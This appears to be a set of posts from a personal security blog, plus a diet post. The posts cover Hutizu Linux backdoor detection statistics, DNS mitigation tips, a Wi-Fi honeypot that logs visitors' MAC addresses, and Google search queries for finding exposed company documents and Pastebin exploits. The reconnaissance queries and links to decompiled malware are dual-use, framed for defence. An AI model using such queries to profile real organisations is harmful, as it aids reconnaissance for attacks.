To keep me going during the day, I drink a lot of caffeine.  I was drinking two 20 oz sodas during the work day.  That's 550 calories, and 156g of carbohydrates.  That's 50% of your daily allowance for carbohydrates for a 2,000 calorie diet!

On top of all this, I normally eat a microwave meal at about 400 calories, 41 carbohydrates.  I usually have a bag of chips with my meal, so that's 160 more calories and 15g more carbohydrates.  Sometimes I'll even eat a mid-afternoon snack, doubling those values.

So, totaling all this up, I've consumed BEFORE I go home for dinner:
1270 calories (63.5% of daily allowance for 2,000 calorie diet)
212g carbohydrates (70% of daily allowance for 2,000 calorie diet)


Then when I got home, I would eat a large dinner with my wife, drink MORE soda, and greatly exceed the number of calories, carbs, and sugars I should be taking in.


Now:
I still don't have time to eat breakfast, so I still eat lunch around 11 am.

I switched from 2 sodas per day to 2 ZipFizz with bottled water per day.  That's 20 calories, and 4 carbohydrates total.  But I've still got the same amount of energy, and can keep going all day long without feeling tired.

I switched my microwave dinners to something with less calories, 350 calories instead of 550, but more carbohydrates (55g). I cut out the the bag of chips with my meal.

Finally, I eliminated my afternoon snack and replaced it with "chewable adult multivitamins" which look like gummy bears, and taste "decent".  These have 50 calories, 11g carbohydrates.

Update: Added nutritional information for the multivitamins.

So now, during the day I'm consuming the following:
420 calories (21% of daily allowance for 2,000 calorie diet)
71g carbohydrates (24% of daily allowance for 2,000 calorie diet)

And the best part about it is, I haven't had to change how much I exercise or how much I eat for dinner. The only change I've made in the evenings is switching to diet soda instead of regular.

The weight loss has been slow but steady, and I feel healthier.

I encourage you to give ZipFizz a try as an alternative to coffee or soda, especially if you need to lose some weight.

You probably are questioning if ZipFizz paid me to type this blog post.  They didn't.  Ask them.
I wrote this blog post because like many people in the IT field, I have a weight problem, and I want to do something about it.  I want to help others do something about it.

Disclaimer: I'm not a physician, this is not medical advice, not responsible for what you do with this information.  Consult a doctor before making serious changes in your diet.

Sony BRAVIA TV Datagram Flooding Denial of Service

Here's an interesting vulnerability...

Who would have thought you'd need to worry about your TV being subject to an attack?

A vulnerability has been reported in Sony BRAVIA TV, which can be exploited by malicious people to cause a DoS (Denial of Service).

Source: Secunia Advisory SA48705

Project Beekeeper - A Mobile Honeypot Project

I'm proud to announce my latest research project, Project Beekeeper.

In this project I will be creating a mobile "hotspot" and taking it to public locations, keeping track of how many people connect at each location over a period of time.

I won't be scanning them when they connect, simply recording their system/phone name and MAC address, and collecting statistics.

I'll be using a rooted HTC T-Mobile G1 running Android 1.6, which is no longer connected to a wireless carrier.

This will all be made possible by Barnacle Wifi Tether, a great piece of software which is available on Google Play.

Why am I in Computer Security? Ask the U.S. Commerce Department

Should we ever get to the point where the computers we use present more risk than provide value, it will undoubtedly be time to unplug them.

I could write a very lengthy article on why I am in the computer security field.  But I'm not going to.

Instead, I'm going to link to a news article about the U.S. Commerce Department's Economic Development Administration.  This is what I want to help prevent from happening. 

Computer Virus Plunges Government Agency Into Dark Ages

How to Mitigate Anonymous' Internet Shutdown March 31

In case you haven't heard, Anonymous plans to shutdown the internet March 31 to protest a multitude of issues which I'm not going to bother to get into right now.

The plan is to attack all 13 root DNS servers with Denial of Service (DoS) attacks.

By shutting down all 13 root DNS servers, a domino effect will be felt throughout the internet and eventually all DNS queries will begin to time out.

Their plan is pretty bold, and will require a tremendous number of computer systems attacking at once.

While it is unknown if Anonymous' plan can succeed, there are a few things you can do to mitigate this threat from affecting your organization.

1) Don't panic. This shutdown is on a Saturday, so the number of employees this affects will be minimal.  If your organization isn't even open on Saturdays, then this won't affect your organization at all.

2) If you are open on Saturday, consider putting one of your local DNS servers in caching mode if it isn't already, and increase the DNS caching time to live (TTL) to 86400 seconds (24 hours).  Any commonly used sites should remain cached throughout the attack.  It's a good idea to revert to your original settings Monday morning.

3) Finally, if you absolutely must have access to certain websites with static IP addresses, such as business partners or suppliers, consider making available to your on-call support staff a hosts file with critical domain names and IP addresses pre-loaded, so that they can drop this file on any organizational systems which start to have DNS problems.  Once again, revert to your original settings Monday morning.

These three simple tips should help keep your organization up and running, should Anonymous actually succeed in taking down one or more root DNS servers.

For home users, I would recommend checking your local weekend weather forecast Friday evening.  If it's going to be nice out, be ready to go outside for a change, get some exercise and have some fun.  If not, consider breaking out some board games for the kids, or find yourself a nice book to read.  It's only one day, if it even happens, and it's not the end of the world.

Executable and Linkable Format (ELF) Guide

Yesterday I found a very handy guide for understanding Linux ELF files.  Great for malware analysis!

Thought I would share it with everyone else.

http://www.acsu.buffalo.edu/~charngda/elf.html

Facebook Location Sharing Enabled by Default - Another Threat to your Privacy and Safety

I noticed something disturbing today.  Ever since about the 15th of March (noticed this on some of my Friends posts going back to the 13th), my Facebook posts have started including my location.  That's pretty disturbing, because I never enabled Facebook to share my location.  It would seem Facebook has enabled this setting by default.

In fact, if I wanted everyone to know where I am, I would have typed my location in my Facebook post.

This really becomes problematic if I were to use Facebook while on vacation.  Suddenly my posts will tell everyone I'm not home, and depending on my privacy settings, that's pretty much telling the world "hey, he's on vacation, go steal stuff from his house!".

I've noticed most of my friends posts are including this information as well.

Facebook does provide instructions on disabling location sharing (https://www.facebook.com/about/location) but it's not very clear if these settings stick.

I urge you the next time you post on Facebook, check to see if there is a small gray box below your post which includes your approximate location.  If there is, click the X inside that box to disable location sharing.

Share this message with your friends and family on Facebook, and help them be safe online too!

Flash Farce: The Dangers of Social Media Influencing Real World Actions

We're lucky it hasn't happened yet.  Or maybe it has and we don't know it.

We've all heard how "flash mobs", protests such as "Occupy Wall Street", and even revolutions such as Arab Spring can be organized through social media such as Twitter or Facebook.

Viral videos, trending Twitter hash tags, Change.org petitions, Facebook pages...all of these are "tools" used to help bring about social change.

But how many people actually check the origins of a social change campaign or movement? And would it even do them any good?  How would anyone know the true origins, or motivations, behind an online campaign?

Linux Processes – Memory Layout, exit, and _exit C Functions

This is a great article from TheGeekStuff.com.  Very relevant for those who analyze Linux malware.

"In this article, we will discuss about the memory layout of a process and the process terminating C functions."

Linux Processes – Memory Layout, exit, and _exit C Functions

Hutizu/Huituzi - Follow the Gray Rabbit

When typing Huituzi (the Chinese phonetic originally found in .ssyslog) into Google Translate, when performing phonetic typing for Chinese, huituzi translates into 灰兔子, which in Chinese apparently means "Gray Rabbit".

So, we now know the name of this amazing piece of malware.

According to Wikipedia, in Chinese literature, rabbits accompany Chang'e (the Chinese moon goddess) on the Moon. Also associated with the Chinese New Year (or Lunar New Year), rabbits are also one of the twelve celestial animals in the Chinese Zodiac for the Chinese calendar.

A very interesting note: This malware was discovered in 2011 - the Chinese year of the Metal Rabbit, or "Jīnshǔ tù" (金属兔).

The question remains - how deep does this rabbit hole go?

I'm updating all of my .ssyslog posts to include "Hutizu" since that is the official detection name.

Hutizu and Linux/Bckdr-RKC Detection Statistics

Let's take a look at current detection statistics for Linux/Bckdr-RKC.
The newer variant has been named the Hutizu backdoor by Antivirus vendors.

.xsyslog - The original file placed on my honeypot.
Commonly known as Linux/Bckdr-RKC or Linux/PKC

Metascan:
1/25 detection http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
Fortinet detects as Linux/PKC.A!tr.bdr

VirusTotal:
0/43 detection https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/ 

VirScan:
3/36 detection http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html 
Fortinet detects as Linux/PKC.A!tr.bdr
Kaspersky detects as Backdoor.Linux.PKC.a

Sophos detects as Linux/Bckdr-RKC


.ssyslog - The newer variant
Commonly known as "Hutizu"

Metascan:
3/25 detection http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0
ArcaVir detects as Linux.Hutizu.a
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu

VirusTotal:
7/43 detection https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/ 
Comodo detects as UnclassifiedMalware
Emsisoft detects as Backdoor.Linux.Hutizu!IK
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A

VirScan:
8/36 detection http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
a-squared detects as Backdoor.Linux.Hutizu!IK
ArcaVir detects as Linux.Hutizu.a
Comodo detects as UnclassifiedMalware
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A

This is good news, as it means anti-virus vendors are starting to detect this malware.

But the bad news is, only a small fraction of AV vendors are detecting it!

Hutizu Under the Hood

Been looking at the STRINGS result of .ssyslog... Which is now detected by a small number of AV vendors as "Hutizu"

http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt

A few interesting items jumped out at me.


Mario 2012 - Help Raise Awareness!

Mario 2012 is a film and campaign by Caffeine Security that aims to make Mario the plumber famous, not to celebrate him, but to raise support for his arrest.

Please watch the video, and support this awareness campaign!

Linux/Bckdr-RKC Delivery Method Analyzed

You can tell a lot about an attacker based upon their methods of attack.
-Automated attacks happen rapidly, with no time for typing
-Manual attacks happen slowly, as the attacker has to type commands
-Typos and misspellings indicate a manual attack
-Connection string will give away what kind of operating system the attacker is using

Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received. 

Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought.

I can't put my finger on it, but after looking at this article on the mystery of the Duqu Framework, and looking at my publicly posted decompilation of Linux/Bckdr-RKC, something strikes me as very familiar between the two.

I've sent this to Kaspersky, so we'll see if they get back to me on it.

Can you see any similarities?  If so, please share!

UPDATE: The virus in question is now being detected by limited AV programs as the "Hutizu" backdoor.

Have you checked out the free security magazines lately, available from Caffeine Security?

Have you checked out the Latest Free IT Security Magazines and Downloads box to the right?

There are some really nice offers available right now, and none of these downloads and magazines cost a dime!

They're just another free service offered by Caffeine Security.

Access some great resources today! -> -> -> ->

The full catalog of available resources is available here: Complimentary Industry Resources

Coming Soon: Android for the Paranoid Article Series

I've decided to write a series of articles titled "Android for the Paranoid".

The articles will be an in-depth look at some of the Android security related applications out there, and how they can be leveraged by you and your organization.

If you have any apps you would like me to specifically look at, please post in the comments section below!

UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection

UPDATE: The latest news on Linux/Bckdr-RKC (.xsyslog) and Hutizu (.ssyslog) can be viewed HERE, including newest detection statistics.  Thanks!


It's been approximately 2 months since the original discovery of Linux/Bckdr-RKC

This Linux trojan is still undetected, according to VirusTotal.com


Virustotal: .xsyslog
Virustotal: .ssyslog


In fact, it would appear that even Sophos is no longer detecting this trojan.

I have resubmitted the file to multiple antivirus vendors, in hopes that they may pay attention to my submission this time.

For those who aren't familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan.  http://pastebin.com/DwtX9dMd

I'd also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google code project: http://code.google.com/p/caffsec-malware-analysis/

Keep fighting the good fight.

CaffSec SITREP - Cyber Intelligence for the masses

Leveraging the power of Google Alerts, I have started posting relevant news articles, public exploit releases, and other tidbits of information related to Cyber Security and Information Assurance.

The best way to keep you and your organization prepared for unknown threats is to keep tabs on the current state of the security of the internet.

There are currently three ways to view SITREP messages:

Twitter, following @CaffSec
Tumblr through the CaffSec SITREP blog
The CaffSec Daily SITREP Online Newspaper

Please enjoy these valuable resources!

New @CaffSec Twitter Feature: #exploitAlert

I've taken the Google Alert "zero day" exploit feed and created automated Twitter notifications.

You can get updated #exploitAlert notifications by following my Twitter account, @CaffSec.

The feed currently monitors PasteBin for new exploits.  Expect additional feeds soon!

Monitoring for Leaked Company Documents through Google Alerts

This article is part of a series on using Google Alerts to protect you, your family, and your company through early notification of data breaches and leaks.

Previous Articles:

Misuse of Your Personal Information and Google Alerts
Monitoring for New Zero Day Exploits through Google Alerts


If you're following good security practices, all of your internal company documents are properly labeled with important labels such as "Company Proprietary", "Company Sensitive" or "Do Not Distribute".

In fact your company has probably established a standardized header for use on all sensitive documents.

So, when's the last time you performed a Google search for this header?
When's the last time you searched to see what documents are being exposed to the web hosted on your domain?

The results might surprise you.

The Google Hacking Database has some excellent information on how to use Google to find sensitive files.  It's very easy to use some of the search queries there, add your company name or standard header, and see what happens.

In fact, even if you find no results, it would be a great idea to setup Google Alerts to monitor for documents posted (accidentally or otherwise) which appear to be internal company documents.

Here's an example, which should produce results for (hopefully!) intentionally posted documents:

site:blogspot.com filetype:doc OR filetype:xls OR filetype:pdf
The above query will return common office documents which are hosted on blogspot.com, or any subdomains.  Replace blogspot.com with your main domain, and see what results you find.

Beware: Many hackers already know these tricks, and will use them to perform reconnaissance on your company before initiating an attack.  Even the most mundane documents, such as a list of email addresses and phone numbers, could be used to assist in launching a spear phishing (targeted phishing) attack against your company.

Monitoring for New Zero Day Exploits through Google Alerts

In case you haven't read it, I previously posted a how-to for using Google Alerts to monitor for misuse of your personal information...

Misuse of Your Personal Information and Google Alerts

Today I'm going to expand on that post, and show how advanced Google search strings can be used to monitor for other things, such as when new zero day exploits are posted publicly to Pastebin.

For those not familiar with it, Pastebin is a large site which allows anyone to post large amounts of text.  One of the common uses for this site is the public disclosure of new vulnerabilities and exploits.

To leverage some of the more powerful features of Google, use advanced search syntax to narrow your search.  An excellent quick reference is available at Google Guide.

Using our previous method to create an "As it happens" alert, let's try writing a custom query which monitors for new exploits...

intext:exploit OR intext:vulnerability OR intext:"zero day" OR intext:"0day" site:pastebin.com
Further tweaking will allow you to target a specific software or manufacturer, such as...
intext:microsoft intext:exploit OR intext:vulnerability OR intext:"zero day" OR intext:"0day" site:pastebin.com

I have provided an example RSS feed for a wide zero day search here.

Of course, this won't give you up-to-the-minute searching of Pastebin, but it's better than not monitoring at all.

Malware Analysis Lab - New Feature!

I'm happy to announce that I have created a Google code project called the Caffeine Security Malware Analysis Lab.

At this project, you will be able to see my current research into unknown malware on my honeypot, and even contribute to my research!

I have uploaded source code for xsyslog and ssyslog, which can be accessed through the source code svn repository.

Checkout the project now!